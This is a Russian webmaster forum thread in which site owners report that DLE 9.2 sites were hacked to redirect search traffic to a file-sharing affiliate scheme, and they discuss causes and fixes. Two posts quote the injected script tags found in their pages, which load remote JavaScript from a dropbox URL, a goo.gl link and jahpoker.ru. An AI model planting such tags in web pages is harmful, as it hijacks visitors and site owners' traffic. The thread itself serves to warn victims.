Осторожно. Ломают DLE.

123 4
Бегемот - болтун
На сайте с 22.03.2009
Offline
39
4607

Только что с огорчением обнаружил, что у меня взломан сайтик на DLE 9.2. Причем, взломали его уже больше месяца назад :mad:

Симптомы были такие - резко упала посещаемость с поисковиков. Потом Яндекс выбросил из поискового индекса. Посещаемость была небольшая, хостов 500, сайт полузаброшенный, я его мысленно похоронил, решил что АГС и забыл.

А сегодня задался мыслью, как так получилось, что позиции в гугле остались а траф исчез. Выяснил, что при переходе с поисковика вместо моего сайта редиректит на какую-то убогую файловую партнерку.:madd:

Обзвонил знакомых сеошников, у одного оказалась та же беда, на сайте с посещаемостью на порядок больше. Видимо, зловредный скрипт редиректит не каждый раз, в итоге посещаемость просто падает, не в 0.

Яндекс вебмастер нагло врет, что "Вредоносный код на сайте не обнаружен".

Создаю тему, дабы предупредить тех, кто мог оказаться жертвой хакеров, чтобы не сливали траф мерзавцам, не зная об этом. Возможно, явление массовое, одну тему такую уже нашел

ГG
На сайте с 09.10.2007
Offline
97
#1

похожая ситуация, только внедряли код через модуль переходы и вставляли ссылку на скрипт

<script src=http://dl.dropbox.com/u/37061427/1.js> </script>

или

<script src=http://goo.gl/dFyS5> </script>

Бегемот - болтун
На сайте с 22.03.2009
Offline
39
#2

У меня такой код после <body>: <script src=http://jahpoker.ru/l.js></script>

FX
На сайте с 20.05.2009
Offline
23
#3
Бегемот - болтун:
У меня такой код после <body>: <script src=http://jahpoker.ru/l.js></script>

Ищите трояна и меняйте пароли.

Заметки и статьи о продвижении сайтов (http://blogobit.ru/seo). Компания RangeVision – производитель 3d сканеров (http://rangevision.com). Экспертиза промышленной безопасности (http://экспертиза-пб.su) у нас.
FaeR
На сайте с 19.03.2009
Offline
151
#4
модуль переходы

Недавно обсуждалось, что ломают через этот модуль. Так что вам совет обновить его до последней версии или снять, и поменять все пароли.

VPS от 2.9 евро, сервера от 29 евро (https://bill2fast.com/aff.php?aff=1063)
FX
На сайте с 20.05.2009
Offline
23
#5
FaeR:
Недавно обсуждалось, что ломают через этот модуль.

Думал троян

vandamme
На сайте с 30.11.2008
Offline
675
#6
FaeR:
Недавно обсуждалось, что ломают через этот модуль. Так что вам совет обновить его до последней версии или снять, и поменять все пароли.

нафиг он вообще нужен, не понимаю людей

Бегемот - болтун
На сайте с 22.03.2009
Offline
39
#7
модуль переходы

У меня такого модуля не было на том сайте... Сейчас на работе сижу, не могу пока точно определить причину, тут нет доступа к фтп.

Главное, что эта зараза, пока не разберешься, выглядит со стороны как фильтр поисковика или АГС. Счетчик ливинета прогрузиться не успевает, а траф уходит на три веселых буквы (((.

vandamme
На сайте с 30.11.2008
Offline
675
#8

что тут непонятного? трояна подловил, через фтп злоумышленники залил в автомате яваскрипты

Rebz
На сайте с 27.01.2009
Offline
58
#9

Если проблема насущна, могу предолжить аудит сайта. Найдем и обезвредим, как говорится :)

rebz.net - Профессиональный аудит безопасности сайтов (http://rebz.net) (ОТЗЫВЫ (http://forum.antichat.net/threadnav153966-1-10.html)) Мы надежно защитим Ваш бизнес в интернете.
EVGENIY22
На сайте с 07.11.2006
Offline
408
#10

ТС найдите ПП, на которую идет слив и пишите им абузу, нормальная партнерка залочит убогого.

Скупаю сайты с доходом от контекста - Яндекс директ и Google Adsense! Пишем в личку.
123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий